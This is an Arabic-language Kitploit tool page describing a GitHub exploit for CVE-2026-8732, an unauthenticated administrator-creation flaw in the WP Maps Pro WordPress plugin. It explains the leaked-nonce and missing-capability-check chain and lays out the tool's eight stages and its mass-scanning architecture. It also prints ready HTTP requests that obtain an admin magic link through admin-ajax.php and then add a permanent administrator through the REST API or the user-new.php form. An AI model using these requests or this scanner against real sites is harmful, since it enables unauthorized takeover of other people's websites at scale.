Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-8732 — استغلال آلي من 8 مراحل لـ CVE-2026-8732، وهو تصعيد امتيازات غير مصادق عليه في WP Maps Pro ≤ 6.1.0. يستخدم المعالجة المتعددة و asyncio لمسح الأهداف، واستخراج nonces، وإنشاء حسابات إدارية. | Kitploit
أدوات/GitHubGitHub/zycoder0day/cve-2026-8732
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubzycoder0day/cve-2026-8732

CVE-2026-8732

استغلال آلي من 8 مراحل لـ CVE-2026-8732، وهو تصعيد امتيازات غير مصادق عليه في WP Maps Pro ≤ 6.1.0. يستخدم المعالجة المتعددة و asyncio لمسح الأهداف، واستخراج nonces، وإنشاء حسابات إدارية.

عرض المستودع
24منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

⚔️ CVE-2026-8732

WP Maps Pro ≤ 6.1.0 — تصعيد الصلاحيات بدون مصادقة

CVSS 9.8 CRITICAL CWE-306 Python 3.8+ License MIT

أتمتة استغلال من 8 مراحل | تعدد العمليات + Asyncio | إنشاء مدير موثَّق


🎯 حول الثغرة

إضافة ووردبريس WP Maps Pro الإصدار ≤ 6.1.0 تحتوي على ثغرة تصعيد صلاحيات بدون مصادقة. يمكن للمهاجم دون أي بيانات اعتماد إنشاء حساب مدير والاستيلاء الكامل على الموقع.

تنشأ الثغرة من ميزة "الوصول المؤقت" (Temporary Access) المصممة لفريق دعم البائع FlipperCode، لكنها مكشوفة للعامة دون حماية كافية.

المعلوماتالتفاصيل
CVECVE-2026-8732
CVSS9.8 (حرج) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
الإضافةWP Maps Pro (wp-google-map-gold)
البائعFlipperCode
الإصدارات المتأثرة≤ 6.1.0
الإصدار المُصحَّح6.1.1
النوعفقدان المصادقة لوظيفة حرجة (CWE-306)
التأثيرإنشاء مدير بدون مصادقة → سيطرة كاملة على الموقع
كاتب الإثباتXENON1337

🔥 ثلاث نقاط ضعف مترابطة

┌──────────────────────────────────────────────────────────────┐
│  الضعف 1 — نقطة نهاية مكشوفة بدون مصادقة                    │
│  ▸ إجراء AJAX مسجل باستخدام wp_ajax_nopriv_                 │
│  ▸ يمكن لأي شخص الوصول دون تسجيل الدخول                      │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  الضعف 2 — تسريب Nonce في الصفحات العامة                    │
│  ▸ كائن wpgmp_local.nonce مضمن في كل صفحة                   │
│  ▸ يمكن للمهاجم استخراج nonce من مصدر HTML                   │
└──────────────────────┬───────────────────────────────────────┘
                       │
┌──────────────────────▼───────────────────────────────────────┐
│  الضعف 3 — لا يوجد فحص صلاحيات                              │
│  ▸ دالة الاستدعاء تتحقق فقط من nonce                       │
│  ▸ لا يوجد current_user_can() — لا يوجد دفاع إضافي          │
└──────────────────────────────────────────────────────────────┘

⚡ سلسلة الهجوم — 8 مراحل

  ┌─────────┐   ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ المرحلة │──▶│ المرحلة  │──▶│ المرحلة  │──▶│ المرحلة  │
  │ 1       │   │ 2        │   │ 3        │   │ 4        │
  │ الحل    │   │ التحقق   │   │ الكشف    │   │ الإصدار  │
  │ HTTPS?  │   │ من WP    │   │ عن       │   │ ≤6.1.0? │
  │ HTTP?   │   │ wp-content│   │ الإضافة  │   │ WAF?     │
  │         │   │ wp-login  │   │ wpgmp_   │   │          │
  └─────────┘   └──────────┘   └──────────┘   └─────┬────┘
                                                      │ ضعيف
                                                      ▼
  ┌──────────────────────────────────────────────────────────┐
  │              المرحلة 5 — استخراج Nonce                    │
  │                                                          │
  │  المجموعة أ (API)       المجموعة ب (محتوى)   المجموعة ج │
  │  ├─ M1: صفحات REST     ├─ M4: خريطة الموقع   └─ M7:     │
  │  ├─ M2: بحث REST       ├─ M5: روابط الصفحة     تخمين    │
  │  └─ M3: rest_route     └─ M6: خلاصة RSS/Atom  المسار    │
  │                                                   بالقوة │
  │                                                          │
  │  الهدف: wpgmp_local.nonce = "fc-call-nonce"             │
  └──────────────────────────┬───────────────────────────────┘
                             │ تم العثور على Nonce
                             ▼
  ┌──────────┐   ┌──────────┐   ┌──────────┐
  │ المرحلة  │──▶│ المرحلة  │──▶│ المرحلة  │
  │ 6        │   │ 7        │   │ 8        │
  │ الاستغلال│   │ التحقق   │   │ إضافة    │
  │ POST AJAX│   │ رابط سحري│   │ مدير دائم│
  │ nonce+   │   │ Cookie   │   │ REST API │
  │ check_   │   │ login    │   │ نموذج    │
  │ temp=false│   │ التحقق   │   │ WP-Admin │
  └──────────┘   └──────────┘   └──────────┘
                                       │
                                       ▼
                               ✅ تم إنشاء المدير
                               تسجيل الدخول: wp_xxxx / كلمة مرور
                               الدور: administrator

تفاصيل كل مرحلة

المرحلةالاسمالوظيفةالطلبات
1الحلاختيار HTTPS/HTTP بالتوازي1
2التحقق من WPالتأكد من أن الهدف هو ووردبريس0
3الكشف عن الإضافةفحص مؤشرات WP Maps في 3 طبقات0-4
4الإصدار + WAFقراءة readme.txt / CSS ?ver= + كشف WAF1
5استخراج Nonce7 طرق بحث في 3 مجموعات متوازية0-150
6الاستغلالPOST إلى admin-ajax.php → إنشاء حساب مدير مؤقت1
7التحققالوصول إلى الرابط السحري → تأكيد جلسة المدير2
8إضافة مديرREST API (رئيسي) + نموذج WP-Admin (احتياطي)4

🛠️ طرق الهجوم

الطريقة 1: الاستغلال الأساسي — إنشاء مدير بدون مصادقة

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpgmp_temp_access_ajax
nonce=<NONCE المستخرج>
check_temp=false

الرد إذا كان الهدف ضعيفاً:

{"url":"https://target.com/?wpgmp_access=abc123def456"}

هذا الرابط السحري يمنح تسجيل دخول تلقائي باسم fc_user_XXXXX (الدور: administrator).

الطريقة 2: إضافة مدير دائم عبر REST API

POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-WP-Nonce: <REST_NONCE>
Content-Type: application/json

{
  "username": "wp_xxxxxxxx",
  "email": "user@localhost",
  "password": "Str0ng!Pass#2026",
  "roles": ["administrator"]
}

الطريقة 3: إضافة مدير عبر نموذج WP-Admin (احتياطي)

POST /wp-admin/user-new.php HTTP/1.1
Host: target.com
Cookie: [كوكيز المدير]
Content-Type: application/x-www-form-urlencoded

user_login=wp_xxxxxxxx
email=user@localhost
pass1=Str0ng!Pass#2026
pass2=Str0ng!Pass#2026
pw_weak=1                       <-- مفتاح: تأكيد كلمة المرور الضعيفة
role=administrator
createuser=Add New User
_wpnonce_create-user=<NONCE>

نقطة مهمة: يجب تضمين pw_weak=1 — ووردبريس يرفض كلمة المرور الضعيفة بدون هذه المعلمة.


📐 البنية

CVE-2026-8732.py
│
├── 📦 باحث Nonce — يبحث عن nonce بـ 7 طرق
│   ├── المجموعة أ (API): M1 صفحات REST، M2 بحث REST، M3 rest_route
│   ├── المجموعة ب (محتوى): M4 خريطة الموقع، M5 روابط الصفحة الرئيسية، M6 خلاصة RSS
│   └── المجموعة ج (قوة): M7 تخمين المسار (أكثر من 30 مساراً شائعاً)
│
├── ⚔️ المستغل — محرك استغلال من 8 مراحل
│   ├── resolve()           → المرحلة 1: اختيار البروتوكول
│   ├── check_wp()           → المرحلة 2: التحقق من ووردبريس
│   ├── detect_plugin()      → المرحلة 3: كشف الإضافة + nonce مبكر
│   ├── detect_version()     → المرحلة 4: كشف الإصدار + WAF
│   ├── exploit()            → المرحلة 6: الاستغلال الأساسي
│   ├── verify()             → المرحلة 7: التحقق من دخول المدير
│   └── add_admin()          → المرحلة 8: إضافة مدير دائم
│
├── 🔧 عملية العامل — عمليات متعددة
│   ├── producer()           → قراءة النطاق من mp.Queue
│   └── consumer() (N)       → تنفيذ المسح المتوازي
│
└── 🖥️ الماسح — واجهة المستخدم
    ├── single()             → وضع هدف واحد (تفاعلي)
    └── multi()              → وضع أهداف متعددة (جماعي)

تدفق البيانات

تنزيل الأداة